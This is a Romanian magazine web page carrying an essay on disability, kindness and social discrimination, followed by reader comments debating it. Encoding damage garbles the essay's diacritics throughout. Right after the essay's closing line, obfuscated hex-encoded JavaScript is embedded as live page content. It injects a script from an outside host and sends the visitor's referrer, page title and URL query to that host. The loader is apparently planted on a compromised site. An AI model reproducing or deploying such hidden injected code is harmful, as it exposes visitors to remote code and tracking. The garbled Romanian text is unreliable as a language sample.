Informații contact

REVISTA CULT URA SRL, Str. Marin Sorescu 2A, Targu Jiu, Gorj

Tel. 0731 088 036

Elena pomanaDar cine suntem noi? Este A�ntrebarea care tremurA? pe buzele tuturor. De la savanE�i, filozofi, mai marii A�nE�elepE�i ai lumii, sociologii, psihologii, oamenii simpli, aceastA? A�ntrebare a circulat A�n toate colE�urile lumii, s-au gA?sit mii de rA?spunsuri, dar nimeni nu a reuE�it sA? defineascA? cuprinzA?nd de la un capA?t la altul aceastA? A�ntrebare simplA?.

Noi, oamenii, am devenit persoane, A�notA?m A�n vA?ltoarea fondurilor materiale cu disperare, scoE�A?ndu-ne ochii pentru un bA?nuE�, E�antajA?nd, trA?dA?nd, E�i vA?nzA?ndu-ne conE�tiinE�a E�i sufletul pentru o poziE�ie,A� inima E�i viaE�a pentru un certificat de cA?sA?torie, dispreE�uim E�i distrugem dA?nd, cu precA?dere, valoare banilor E�i uitA?m pildele MA?ntuitorului care ne A�nvaE�A? cA? VeE�nicia n-are preE�. a�zCelui ce are i se va da; dar de la cel ce nu are si ce are i se va luaa�?- (Biblie). Deci sA? A�nvA?E�A?m sA? nu ne mai vindem sufletele pe nimic, cand putem avea Totul.

GA?ndim cu mA?ndrie care este diferenE�a dintre noi, eu E�i tu, doi oameni, puternici sau slabi, bogaE�i sau sA?raci, buni sau rA?i.

Care este diferenE�a dintre mine E�i tine? Ai un job bine plA?tit? Te crezi mai bun? Te-ai integrat cu uE�urinE�A? A�n societate? Ai studii ? deci … Cum se traduce dizabilitatea dintre noi?

De exemplu, A�n loc sA? A�ntrebA?m: a�zCe este greE�it cu persoanele cu dizabilitA?E�i?a�?, A�sA? A�ntrebA?m: a�zCe este greE�it cu societatea? Ce condiE�ii sociale, economice, politice E�i/sau de mediu trebuie sA? fie schimbate pentru a facilita accesul deplin la toate drepturile al tuturor persoanelor cu dizabilitA?E�i?a�? – (ConvenE�ia ONU)

Degeaba avem toate uneltele care ne-ar ajuta sA? ducem o viaE�A? frumoasA? dacA? noi suntem rA?i, haini, vulgari, E�tim sA? hulim, sA? jignim, sA? arA?tam cu degetul, sA? cA?utA?m nod A�n papurA? … cA? se duce pe apa sA?mbetei E�i cultura, E�i inteligenE�a, E�i isteE�imea, deoarece NIMIC, dar nimic nu poate A�nlocui puE�inA? bunA?tate, toleranE�A? E�i A�nE�elegere. BunA?tatea sufleteascA? nu este o virtute, este un atribut care defineE�te fiinE�a omeneascA?.

Nu A�E�i doreE�ti tu oare, aceleaE�i lucruri ca E�i mine? Iubire, atenE�ie, mA?ngA?iere, stabilitate, sinceritate, A�ncredere…aE�teptA?ri pe care le dorim de la aproapele nostru? A�De unde putem E�ti ce destin mA?reA? poate avea o persoanA? cu dizabilitate AYi cA?te suflete poate inspira prin exemplul personal? Discriminarea se simte atunci cA?nd priveE�ti cu dispreE�, superioritate, reproAY, intoleranA?A?. E cam trist dacA? dragostea faE�A? de o fiinE�A? e condiE�ionatA? de a�zperfecE�iunea�?. Nu E�tiu voi, dar eu mi-am dorit sA? fiu trasA? de mA?necA? cA?nd trebuie, sA? A�mi acopA?r ochii E�i sA? nu vA?d ce e rA?u A�n altul dar nici ce pare frumos E�i ascunde A�ncA? o posibilA? ranA?, sA? pot sA? sar E�i sA? A�l apA?r pe celA?lalt, sA? tac atunci cA?nd sunt judecatA? pe nedrept, sA? am ochi sA? vA?d durerea altuia E�i sA? nu A�l las sA? sufere, sA? ofer vorbe frumoase care pot alina un suflet greu A�ncercat, sA? aud ce trebuie E�i sA? pot sA? mA? rog neA�ncetat. A�Oh.. nici nu poE�i sA? E�tii cA?te poate face o rugA?ciune A�n aceastA? lume unde rA?utatea asurzeE�te.

Avem libertatea de a face orice, de a alege orice, de a fi oricine. AZn aceastA? lume, viaE�a prinde din ce A�n ce mai multA? vitezA? sA? A�ncercA?m sA? ne amintim cine suntem E�i ce vrem, sA? nu ne pierdem principiile E�i mai presus de toate credinE�a. AE�teptarea aterizA?rii la punct fix a unei pere mA?lA?ieE�e, nu are cum sA? A�E�i ofere rezultatele mult dorite.

Dizabilitatea se traduce prin bunA?tate sau rA?utate, nicidecum prin defecte fizice.

ToE�i suntem datori cu fapte demne de Rai.

Acum E�tiu, am aflat E�i eu, cel mai frumos A�ndemn: Nu uitaE�i, atunci cA?nd vreE�i sA? judecaE�i, mai bine A�mbrA?E�iE�aE�i!var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Distribuie:

3 Comments

  • Sergiu Neamt, 25 august 2016 @ 7:24 Reply

    Este provocator sensul expresiei “dizabilitate dintre noi”, fapt care ma duce cu gandul la o relatia intre doua persoane cum ar fi relatie de prietenie, apreciere, dusmanie si care implica existenta unei legi de compozitie. Asta e din matematica. Relatia pe care o propui tu insa nu este matematica si nu sunt de acord cu tine in traducerea in bunatate sau rautate. Dizabilitatea exista independent de faptul ca ne facem ca o vedem sau nu. Ea este o realitate care ne afecteaza anumite functionalitati iar noi aspiram la o societate civilizata de la care ne asteptam sa compenseze disfunctionalitatile pe care le avem.
    O persoana cu dizabilitati, nu este apriori nici buna nici rea, cum nici o persoana abila dealtfel. Dizabilitatea este un fenomen mult mai larg si implicatiile sunt de multe ori nebanuite. Deci „traducerea” dizabilitatii este mai complicata decat sensul clasicist, unde frumosul era bun si destept, iar uratul era privit ca rau si demonizat.
    Din pacate tocmai acest mod de gandire este regasit in constiinta colectiva iar traducerea ta duce de cele mai multe ori doar la „dizabilitate egal rautate”, ca sa fiu mai explicit dizabilitatea este privita ca pacat, chiar daca nu infaptuit in viata noastra ci a succesorilor.
    Inteleg foarte bine aspiratiile tale, deasemeni si piedicile care stau in calea realizarii lor. Din pacate nu cred in ciuda eforturilor depuse de societate posibilitatea de realizare deplina, pe toate planurile a unei persoane cu dizabilitati (spiritual, profesional, emotional, pe plan familial, …) va putea fi atinsa vreodata, asa cum nici unei persoane „normale” nu este posibila.

  • Elena Pomana, 26 august 2016 @ 22:14 Reply

    Iti apreciez punctul de vedere, dar cu siguranta n-ai prins esenta ideii 🙂

  • Sergiu Neamt, 9 septembrie 2016 @ 7:32 Reply

    Mintea mea e setata in a cauta sensul direct al cuvintelor, de aceea imaginatia mea o poate lua razna, iar din niste premize gresite voi construi un rationament corect, care din pacate va duce tot la niste rezultate eronate.

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *

Acest site folosește Akismet pentru a reduce spamul. Află cum sunt procesate datele comentariilor tale.